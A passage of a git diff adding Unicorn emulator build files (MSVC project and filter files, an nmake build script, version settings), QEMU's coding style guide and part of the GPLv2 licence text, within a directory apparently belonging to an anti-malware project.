Include="..\..\..\qemu\target-i386\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{17077E86-AE7C-41AF-86ED-2BAC03B019BC}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>x86_64softmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + 
<WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + 
<IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-i386;../../../include</AdditionalIncludeDirectories> + <ForcedIncludeFiles>x86_64.h</ForcedIncludeFiles> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + 
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-i386;../../../include</AdditionalIncludeDirectories> + <ForcedIncludeFiles>x86_64.h</ForcedIncludeFiles> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-i386;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>x86_64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + 
<GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-i386;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>x86_64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj.filters new file mode 100644 index 
0000000..2ee64ce --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj.filters @@ -0,0 +1,164 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{db59a62f-c036-40c3-9dd8-8b30c9f06415}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{42fe7224-78f7-45a5-a173-9ed3bdeb1985}</UniqueIdentifier> + </Filter> + <Filter Include="hw\i386"> + <UniqueIdentifier>{f33c9635-4286-435a-ab9c-3f2f245ce7f9}</UniqueIdentifier> + </Filter> + <Filter Include="hw\intc"> + <UniqueIdentifier>{afdb0084-499f-46ea-97a2-6920a8f64800}</UniqueIdentifier> + </Filter> + <Filter Include="target-i386"> + <UniqueIdentifier>{dc6b560b-40ea-47a1-91f1-50718313849f}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{d3a1fd5b-09b0-4896-af49-5b3668f03a72}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{9b7b99b2-982e-46b5-aff2-1ff3a353d3db}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\cpu-qom.h"> + <Filter>target-i386</Filter> + 
</ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\cc_helper_template.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\cpu.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\helper.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\ops_sse.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\ops_sse_header.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\shift_helper_template.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\svm.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\topology.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-i386\unicorn.h"> + <Filter>target-i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\x86_64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\i386\pc.c"> + <Filter>hw\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\i386\pc_piix.c"> + <Filter>hw\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\intc\apic.c"> + 
<Filter>hw\intc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\intc\apic_common.c"> + <Filter>hw\intc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\arch_memory_mapping.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\cc_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\cpu.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\excp_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\fpu_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\int_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\mem_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\misc_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\seg_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\smm_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\svm_helper.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\translate.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-i386\unicorn.c"> + <Filter>target-i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file 
diff --git a/ai_anti_malware/unicorn/unicorn-master/nmake.bat b/ai_anti_malware/unicorn/unicorn-master/nmake.bat new file mode 100644 index 0000000..e2a192b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/nmake.bat @@ -0,0 +1,40 @@ +:: Unicorn Emulator Engine +:: Build Unicorn libs on Windows with CMake & Nmake +:: Usage: nmake.bat [x86 arm aarch64 m68k mips sparc], default build all. +:: By Huitao Chen, 2019 + +@echo off + +set flags="-DCMAKE_BUILD_TYPE=Release" + +set allparams= + +:loop +set str=%1 +if "%str%"=="" ( + goto end +) +set allparams=%allparams% %str% +shift /0 +goto loop + +:end +if "%allparams%"=="" ( + goto eof +) +:: remove left, right blank +:intercept_left +if "%allparams:~0,1%"==" " set "allparams=%allparams:~1%" & goto intercept_left + +:intercept_right +if "%allparams:~-1%"==" " set "allparams=%allparams:~0,-1%" & goto intercept_right + +:eof + +if "%allparams%"=="" ( +cmake "%flags%" -G "NMake Makefiles" .. +) else ( +cmake "%flags%" "-DUNICORN_ARCH=%allparams%" -G "NMake Makefiles" .. +) + +nmake diff --git a/ai_anti_malware/unicorn/unicorn-master/pkgconfig.mk b/ai_anti_malware/unicorn/unicorn-master/pkgconfig.mk new file mode 100644 index 0000000..d9c3974 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/pkgconfig.mk @@ -0,0 +1,13 @@ +# Package version of Unicorn for Makefile. +# To be used to generate unicorn.pc for pkg-config +# Also used to generate python package version + +# version major & minor +PKG_MAJOR = 1 +PKG_MINOR = 0 + +# version bugfix level. Example: PKG_EXTRA = 1 +PKG_EXTRA = 2 + +# version tag. 
Examples: rc1, b2, post1 +# PKG_TAG = rc6 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/CODING_STYLE b/ai_anti_malware/unicorn/unicorn-master/qemu/CODING_STYLE new file mode 100644 index 0000000..d46cfa5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/CODING_STYLE @@ -0,0 +1,107 @@ +QEMU Coding Style +================= + +Please use the script checkpatch.pl in the scripts directory to check +patches before submitting. + +1. Whitespace + +Of course, the most important aspect in any coding style is whitespace. +Crusty old coders who have trouble spotting the glasses on their noses +can tell the difference between a tab and eight spaces from a distance +of approximately fifteen parsecs. Many a flamewar have been fought and +lost on this issue. + +QEMU indents are four spaces. Tabs are never used, except in Makefiles +where they have been irreversibly coded into the syntax. +Spaces of course are superior to tabs because: + + - You have just one way to specify whitespace, not two. Ambiguity breeds + mistakes. + - The confusion surrounding 'use tabs to indent, spaces to justify' is gone. + - Tab indents push your code to the right, making your screen seriously + unbalanced. + - Tabs will be rendered incorrectly on editors who are misconfigured not + to use tab stops of eight positions. + - Tabs are rendered badly in patches, causing off-by-one errors in almost + every line. + - It is the QEMU coding style. + +Do not leave whitespace dangling off the ends of lines. + +2. Line width + +Lines are 80 characters; not longer. + +Rationale: + - Some people like to tile their 24" screens with a 6x4 matrix of 80x24 + xterms and use vi in all of them. The best way to punish them is to + let them keep doing it. + - Code and especially patches is much more readable if limited to a sane + line length. Eighty is traditional. + - It is the QEMU coding style. + +3. Naming + +Variables are lower_case_with_underscores; easy to type and read. 
Structured +type names are in CamelCase; harder to type but standing out. Enum type +names and function type names should also be in CamelCase. Scalar type +names are lower_case_with_underscores_ending_with_a_t, like the POSIX +uint64_t and family. Note that this last convention contradicts POSIX +and is therefore likely to be changed. + +When wrapping standard library functions, use the prefix qemu_ to alert +readers that they are seeing a wrapped version; otherwise avoid this prefix. + +4. Block structure + +Every indented statement is braced; even if the block contains just one +statement. The opening brace is on the line that contains the control +flow statement that introduces the new block; the closing brace is on the +same line as the else keyword, or on a line by itself if there is no else +keyword. Example: + + if (a == 5) { + printf("a was 5.\n"); + } else if (a == 6) { + printf("a was 6.\n"); + } else { + printf("a was something else entirely.\n"); + } + +Note that 'else if' is considered a single statement; otherwise a long if/ +else if/else if/.../else sequence would need an indent for every else +statement. + +An exception is the opening brace for a function; for reasons of tradition +and clarity it comes on a line by itself: + + void a_function(void) + { + do_something(); + } + +Rationale: a consistent (except for functions...) bracing style reduces +ambiguity and avoids needless churn when lines are added or removed. +Furthermore, it is the QEMU coding style. + +5. Declarations + +Mixed declarations (interleaving statements and declarations within blocks) +are not allowed; declarations should be at the beginning of blocks. In other +words, the code should not generate warnings if using GCC's +-Wdeclaration-after-statement option. + +6. 
Conditional statements + +When comparing a variable for (in)equality with a constant, list the +constant on the right, as in: + +if (a == 1) { + /* Reads like: "If a equals 1" */ + do_something(); +} + +Rationale: Yoda conditions (as in 'if (1 == a)') are awkward to read. +Besides, good compilers already warn users when '==' is mis-typed as '=', +even when the constant is on the right. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING b/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING new file mode 100644 index 0000000..00ccfbb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/COPYING @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. 
+ + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. 
The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. 
+ + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. 
+ +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. 
However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. 
+You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. 
